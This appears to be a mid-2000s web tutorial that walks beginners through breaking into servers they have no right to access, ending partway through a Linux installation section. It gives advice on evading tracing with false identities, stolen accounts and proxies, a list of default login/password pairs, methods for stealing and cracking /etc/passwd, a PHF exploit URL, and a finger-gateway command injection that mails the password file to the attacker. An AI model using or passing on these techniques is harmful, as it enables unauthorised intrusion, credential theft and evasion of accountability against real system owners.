�
By PranaY, � Feb, 2006. . You are
free to distribute this page on your site, all I ask is that you leave this notice here
and place a link to http://www.ethicalhacker.tk on your site.
This guide is Beta, and starts at the absolute basics -
step by step. If you like it, I'll try to keep adding sections. If you know your stuff,
send me sections you've written yourself and I'll add them in. If you want to put this
guide on your site, contact me
�
[I Want to Start at
the Start]
[I Want
to Go Straight to Hacking]
�
INTRODUCTION:
A little background is needed before we get into hacking techniques.
When we talk about �Hacking�, we are talking about getting some access on a
server we shouldn�t have. Servers are set up so that many people can use them. These
people each have different �accounts� on the server � like different
directories that belong just to them. If Fred has an account with the ISP (Internet Service Provider), he will be given:
(1) a login name, which is like the name of
your directory; and
(2) a password, which lets you get access to that directory.
This login name and password will usually
give you access to all of Fred�s services - his mail, news services and web pages.
There is also the �root� account, which has it�s own login and password.
This gives super-user access to the entire server. We will focus on �getting
root�, in this help file.
�
�
[Ok, I
want to move to the 'anatomy of the hack']
[I know all
this, let me move straight to hacking]
[I don't have a clue what you're on about, let
me read some background
on this so called "Internet" you keep referring to]
�
THE
ANATOMY OF THE 'HACK':
There are two main ways to break into a
system. Think of a server as a Swiss Bank Vault. There are two main ways to get in. You
can try to get in by finding the combination of the vault. This is like finding the
password. It�s how you are meant to get in. The second way is by using dynamite. You
forget all about the �proper� way to get in. This is like using
�exploits�, or weaknesses in the servers operating system to gain access.
�
[Ok, Let's
Go. Tell Me About Not Getting Caught]
[Stuff it, I know
how to not get caught, on to the techniques!]
�
'DON'T GET
CAUGHT':
Hacking is illegal, and it is very easy to trace you if
realizes you hacked them. Wherever you go,
your IP number (your computer�s unique identification) is left and often logged.
Solutions:
1. When you set up your account with an ISP, give a false name and address. Or, even better, sign up for an anonymous dial-up account from anonymizer.com here.
�
[Nah, I
can't be bothered, what other things can I do?]
[Ok, I used
this trick. What else can I do?]
[Stuff it, I know
how to not get caught, on to the techniques!]
�
'DON'T GET
CAUGHT':
2. Hack using a filched account (stolen password, etc.). A
tool can steal
passwords for you from public net cafes and libraries.
�
[Nah, just
tell me something easy I can do right now]
[Ok, done.
Anything else I should do?]
�
'DON'T GET CAUGHT':
3. Port your connection through something else.
An easy way to do this is to change your proxy settings. By
using the proxy settings meant for a different ISP, it can look like you are surfing from
wherever that ISP is. A list of proxies you can use is proxy servers,hide ip platinum,wingate,winproxy.
You should also do any important info gathering through the
IP Jamming Applet to hide your
IP.
If you want super anonymity, you should be surfing in an
account you set up under a false name, with your proxy settings changed, and also surfing
through the IP Jamming applet! Be aware that some ISPs could use Caller ID to test the
number of someone logging on. Dial the relevant code to disable Caller ID before calling
your ISP.
[I don't understand about the proxy settings
thing, let me read more]
[Ok, I am wired
for hyper stealth... Now, I want to HACK!]
�
INFO GATHERING:
To start off, you will probably need to gather information about www. using internet tools.
�
[Ok, how?]
[Give me some reading to do about info
gathering]
[No,
I've already got all the info, just tell me what to do]
�
DIRT DIGGING STAGE:
We are now taking the first steps of any hack... Info
Gathering.
You should be set up for stealth mode. Get a notepad, and
open a new browser window (through the IP Jammer). Bring the www.'s web page up in the IP Jammer's window. You can load the IP Jamming applet .
�
[Ok, What Now?]
�
CASE THE JOINT:
1. First, check out the site. Take down any email
addresses, copy down the HTML of important pages.
�
[Done...
What Else?]
�
THE OLD BOUNCING
MAIL TRICK:
2. Send a mail that will bounce to the site. If the site is
www. , send a mail to blahblahblah@ . It will bounce back to you and give you information in
its header.
Copy the information from the headers down.
(To maintain anonymity, it might be a good idea to send and
receive the mail from a free web based provider, such as hotmail.com. Use full stealth
features when sending the bouncing mail. This will protect you when they check through the
logs after they are hacked.)
�
[Done... What Else?]
�
TRACEROUTE:
3. Still using stealth features, Traceroute . This Traceroute search is avaliable from the Hacker's Home Page,
in the Net Tools section.
This will tell you the upstream provider of the victim
server.
�
�
[Ok, what next?]
�
WHOIS:
3. Still using stealth features, Whois the site. This Whois
search is avaliable from the Hacker's Home Page, in the Net Tools section.
This will give you information on the owners and servers
that run the site. Write it down.
�
�
[Ok, what
next?]
�
GIVE 'EM THE FINGER:
4.� Finger the site. Use this finger service at
Cyberarmy.Com to check the site. Try fingering just with �finger @ � first. This sometimes tells you the names of all
accounts. If this does not work, try fingering any email addresses you found on the site,
and through Whois. This will sometimes give you useful information.
�
�
[Ok, what
next?]
�
THE DEADLY PORT SCAN:
5. Now, we're about to get rough on the site. Port Scan the
site.
Port scanning checks for all open ports for an IP. It is
extremely useful, however, it practially screams to the webmaster's of the victim site
that they are in the middle of being hacked. The is basically no legitimate reason to port
scan a site unless you are about to hack it.
There are no very good ways to hide a port scan, but there
are a few semi-stealthy port scanners. Most are only for Linux / Unix systems. However,
the Exploit Generator for Windows is one that claims to be stealthy. However, if you are
trying to enter a very secure site, perhaps forget about port scanning for now, unless you
are running Linux.
Though, port scan will tell you all the services a site is
running. If port 21 is open, it means they have an FTP server. If port 23 is open, it
means they have telnet.
�
[Ok, What next?]
�
TELNETTING:
5. The aim of telnetting to the site is
basically to try and find out the server type. While your browser is in stealth mode, use
the Anonymous Telnet applet to
open a Telnet window.
Telnet to the site to Port 23. Usually, if the
address is �www. �, try telnetting to
" ". If this does not work, try to telnet
to telnet. or try telnetting to any of the sites
listed as name servers in your previous Whois search. Once you have got access, note any
information it gives you, such as server type.
�
�
[This
worked - I got the server type!]
[None of that
worked...]
�
�
TELNETTING:
Now change the telnet to port 21. This should send you
straight in to the server's FTP port. If this works, try typing SYST to find out what
server type it is.
�
�
�
[This
worked - I got the server type!]
[None of that
worked...]
�
TELNETTING:
Now, if you are lucky, try telnetting to port 80, the HTTP
port. Note if this gives you any information.
�
[This
worked - I got the server type!]
[None of
that worked...]
�
RUNNING LAME
PROGRAMS:
You *need* to know the server type to have any
hope of hacking the thing. How do you expect to run exploits against it if you cant even
figure out what you're dealing with here?
A final resort is to run a program called
Whats Running? It doesn't work very well, but will sometimes tell you the server type. It
will also probably be logged by the victim server.
If that doesn't work, do anything to find the
server type. Even write them an e-mail asking� what operating system� they're
running.
�
[Ok,
I've got the Info... Now I want access!]
�
HACKING THROUGH THE
PASSWORD:
We will now try to go through the front door of the server.
As to our analogy, we are trying to find the combination of the safe.
�
[Ok, I Want
Root!]
[Nah,
I already know this server will need exploits]
�
EASY THINGS FIRST:
You would kick yourselves if ya spent weeks trying advanced hacking with exploits, IP
spoofing and social
engineering, just to find that we could have got in by using:
$Login: root
$Password: root
So, let�s just try this first and get it out of the way. Unix comes set up with some
default passwords, and
sometimes these are not changed. So, we telnet to
.
Don�t use your usual telnet program. Unless you are using a filched or anonymous
account, it will show
your IP address to . With your proxies changed,
and everything set for stealth, switch back to the Anonymous Telnet window.
Then try the following accounts and passwords:
ACCOUNT: PASSWORD
(login) root: (password)root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon
The accounts root, mountfsys, umountfsys, install, and sometimes sync are root level
accounts, meaning they have sysop power, or total power. Other logins are just "user
level" logins meaning they only have power
over what files/processes they own.
�
[Nup...
Didn't think it would work]
[Incredible...
That Lame Trick Actually Worked!]
�
USING THE LOGIN NAMES:
Still simple things first. About 1 in 20 people are stupid
enough to have the same login name and password. With your list of all the email addresses
or finger information you dug from the site, try this.
For example, if the web site made a reference to fred@ , try logging in (through telnet or a FTP
program to their server) as:
$Login: Fred
$Password: Fred
Do this with all the names you have found - you might get lucky.
Did this work?
�
[Nah,
they had some baddass security, didn't work]
[Oh, Golly
Gee... I got access to one of the accounts!]
�
GETTING THE PASSWD FILE:
You probably had no luck until now. Actually, most hacking techniques only have a slim
chance of success. You just try hundreds of slim chances till you get it.
Assuming you were trying to log in on a Unix system, you
may have been wondering how Unix checks to see whether the passwords you gave were correct
or not. There is a file called �passwd� on each Unix system which has all the
passwords for each user. So, if we can�t guess the passwords, we will now try to rip
this file and decrypt it.
�
[Make
it so, Number 1]
�
ANCIENT CHINESE FTP
METHOD:
Your browser should be set to use the fake proxies. We will
keep using this browser to FTP, because it cannot be easily traced, whereas something like
CuteFTP can be traced to you because it can't use proxies. If in your port scan, you found
an opne port 21, its a pretty good indication that they run an FTP server.
Using your stealth browser, try to FTP to . Example: ftp://
If that does not work, try to FTP to ftp. .
Example: ftp://ftp.
If that does not work, try to FTP to the Domain Name Servers listed when you did your
WHOIS search. Example: ftp://ns1.
�
[Ok,
I'm In]
[Nah,
stupid thing won't let me in]
�
ANCIENT CHINESE FTP
METHOD:
Now you are connected to
�s FTP server, click on their \etc directory.
You should see a file called �passwd� and maybe a
file called �group�. Download the �passwd� file, and
look at it.
If it looks like this when you open it, you are in luck:
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]
For example, we know a login is �kangaroo� and their encrypted password is
�3A62i9qr�. Note - this is not their password, but an encrypted form of their
password.
Or, did it look more like this:
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
Is the second, encrypted password, section replaced by *�s or x�s? This is bad
� it is called a shadowed
password and cannot be decrypted. This is how most passwd files are now days. However, if
you got a
passwd file which has some non-shadowed entries, you can put your hand to decrypting it.
[Nah,
It was all shadowed]
[Nah,
couldn't find the passwd file in the first place]
[Yes! I
think I got some non-shadowed passwords]
�
DECRYPTING PASSWD FILES:
There are a few programs around which were written to decrypt Unix passwd files. The most
famous one was called �Cracker Jack�. Many �hacking� texts strongly
recommend this file � but they are mostly talking rubbish. Its old and most systems
will just crash when they try to run it, as it uses weird memory allocation.
The best Unix cracker around is currently called 'John the
Ripper 1.5�. It is readily avaliable. It was only written in the last year or so, and
is a lot faster than Cracker Jack ever was. John the Ripper was also designed with
Pentiums in mind, and the brute force techique used is genius. But you have to go down to
DOS to use it.
You will also need a large �wordfile�, with every
English word. Bigger the better. The Crack Programs test every word in the wordfile
against the passwd file. If the wordfile is big enough, you have a good chance of getting
a password.
�
[Yes! I Got Me
Some Decrypted Passwords!]
[Nah,
the Encryption was too Good]
[Give me some reading about all the different
password crackers, where to find them, etc.]
�
THE OLD-STYLE PHF
TECHNIQUE:
Although most servers have now trashed a program called
PHF, let's just make sure... It is is working, it lets you get the passwd file remotely,
even if it is inside hidden and root access only directories.
In the Overlord Anonymizer, type:
http://www./cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd.
�
If PHF is active (often not), this string will print out
the etc/passwd file strait to your web browser all you need to do is save it as a file and
again run a crack program against it.
Now, if you see the words 'Smile! You're on Candid
Camera!', it means that the server is protected against this hack, and has logged your IP.
But don't worry. So long as you were using the anonymizer, you are safe.
�
[Nah, they
fixed that PHF Bug Problem]
[Yes! I
Got Me Some Encrypted Passwords!]
�
FINGER BOX
HACKING:
Finger servers are
hacker's friends. Let's find out whether www. has a finger server.
In the Anonymizer, assuming that the server's name starts with www,
type www./cgi-bin/finger
If the finger gateway is operational a box should appear for you to
enter the name you want to finger. If it is operational you have another chance to receive
the etc/passwd file.
Okay, 1/ get your list of e-mail addresses you found for the site
(let's pretend one of them is "kangaroo@", and that
your email address is "[email protected]")
2/ Go back to the finger box, and type this in (changing these email
addresses for the real ones):
kangaroo@; /bin/mail
[email protected] < etc/passwd
This takes the passwd file through kangaroo@ and emails it to your email address. If this works you now have the
etc/passwd file in your mailbox.... you can now run a crack program against it and have a
little fun on their box.
�
[Nah, it
didn't work]
[Yes! I
Got Me Some Encrypted Passwords!]
�
LINUX INSTALLATION
All the above really has given you the
basic ideas. To do anything firther, and impliment any real exploits, you will have to put
a Linux operating system on your computer. Below are some instructions on how to quickly
and easily install Linux on your computer. You can just download the files below for free,
and install them in a directory on your MS-DOS / Windows system! That's right, you dont
even have to repartition your Hard Drive!
Okay... I will make this as basic and
free as possible. I will assume you are running Windows 95 or 98 and have never seen Linux
before. You have a Hard Drive with at least 100MB free. Youve got a floppy drive, etc. You
know how to unzip files. And you dont want to spend any money. Luckily, Linux is free and
easy to set up.
1/ Download
Linux(Australia). It's big. But it's all you need. .
2/ What you have is a version of
Slackware Linux, called zipslack. It's a very simple version of Slackware Linux to set up.
I don't use Slackware, and there are some better versions around now - like RedHat 5.2.
But, it is a good stable version - and, like I say, very simple to download and setup.
Good for a Linux test drive.
3/ Ok, make a directory called 'Linux'
on your Hard Drive. That's right, with this distro, you dont even have to repartition your
drive. It can be on the same Hard Drive you have Windows on! (I told you this would be
easy). Just make sure its a major directory on your hard drive, like c:\linux - not in a
subdirectory anywhere.
4/ Now, just unzip all the contents of
the zipslack.zip into the right directories, like c:\linux\etc, c:\linux\usr, etc.
5/ Now, heres the hardest part. You
will have to edit the \linux\linux.bat file. Open it in an editor.
6/ You'll need to edit the LINUX.BAT file, and make sure
the root=/dev/XXXX points to your Hard Drive. If you have put it on your main hard drive,
you can make the line:
\linux\loadlin \linux\vmlinuz
root=/dev/hda1 (hda1 means the IDE1 Master HDD)
I have Linux on my drive D: (the IDE2
Master HDD), and for me the line would be:
\linux\loadlin \linux\vmlinuz
root=/dev/hdc1
7/ If you are unsure, the Linux.bat
file has a long list of examples. Just guess. If you get it wrong, you'll still be able to use scrollback (right shift key
and PageUp) when the kernel halts to go back and look at your partitions, noting the names
Linux gives them. With this information, you should be able to edit the LINUX.BAT
correctly.
8/ Well, I skipped ahead of myself. You
are now (already) ready to boot up your Linux system. Who said it was hard?
9/ Ok, you must go 'Shut Down' and
'Restart in MS-DOS Mode'. Then just go to the \Linux directory ('cd linux') and run
Linux.bat
10/ The Linux system will load itself
over MS-DOS (though you don't need to load it over DOS - later you can make a boot-disk so
only linux loads).
11/ You will see a whole lot of stuff
loading. Then you will see a login: prompt.
12/ You have an operating system just
like all the big net servers have!
13/ Okay, just type in 'root', and you
have root access on the system. You will want to give yourself a password, so type
'passwd'. Choose something you will remember. Without it, you cannot log in.
14/ Now you will have a black screen
with a # looking at you. Dont let that worry you - its just like a MS-DOS screen. A few
commands for now: 'ls' (like 'dir' in MS-DOS), 'cd' (change directory, like dos), 'pico'
(an editor, use like 'pico text.txt'), and 'mc' (this is a nice menu program that comes
with zipslack).
15/ Now, type 'setup'.
16/ Setup your mouse, network settings,
screen stuff. Really easy. Just like - 'are you using a 2 button mouse or 3'? Easy.
17/ Now, if you want net access,
through this - type 'pppsetup'. This starts the ppp (point to point protocol) setup. You
will need to know all your internet settings, like your Gateway, Nameserver numbers, etc.
If you dont know these, go back to windows and see what values you used from the Control
Panel : Internet section.
18/ Okay. Reboot. Your mouse should be
working, with some luck. Hopefully, your modem will be able to dial. Though, often not. If
you have a standard external modem on Com 2, it is probably okay. Otherwise, it's
sometimes a pain to configure your modem for Linux.
19/ If you are having modem troubles,
type 'mc to run the Midnight Commander. Open the 'etc' directory, then 'rc.d', then
'serials.rc'. Comment out the auto config section with '#' signs. And go to the manual
config section. Uncomment� /dev/cua0 (Com 1:) and /dev/cua1 (Com 2:) - or /dev/cua2
or cua3 (Com 3: or 4:) for internal modem users. Now, from windows, go to
Accessories:System Tools:System Information (Win 98) to get the IRQ and Port Settings for
your modem. If you are in Win95, I think you have to run something called msd.com in the
\windows directory. Put these setting in. Then, edit S.rc and at the bottom, uncomment the
place where it says to call the serials.rc file.
20/ If you have a CD-Rom you can also
edit S.rc so that it checks for a CD Rom during bootup.
21/ All things going well, you should
now have a fully functional Unix type system on your computer. You can download all your
latest little X-Crush programs (in .tgz format). To setup Software - say a Linux stealth
port scanner, save the .tgz file in a directory and run 'pkgtool'. Then go 'install file'.
Real easy. If it is a C program, type 'gcc program.c' to compile it.
22/ Well, you are missing a Windows
type interface. You dont need one. But if you want to surf using Linux, etc. It is better
to have a graphical interface - although you can run a browser called 'lynx' just through
the vanilla Linux interface.
23/ You can get some things, like
X-Windows from ftp.cdrom.com/pub/linux/slackware/slakware/x1/
24/ Just get all the files that look
vital (about 8 of them), and run pkgtool to install them all. You will probably find that
setting up X-Win for the first time is a huge pain. It was for me at least - you need to
know, for example, the horizontal and vertical refresh rates of your monitor. Then, get
something like the Linux Netscape, or Arena as a browser. These run thru X-Windows.
25/ You will have fun tweaking
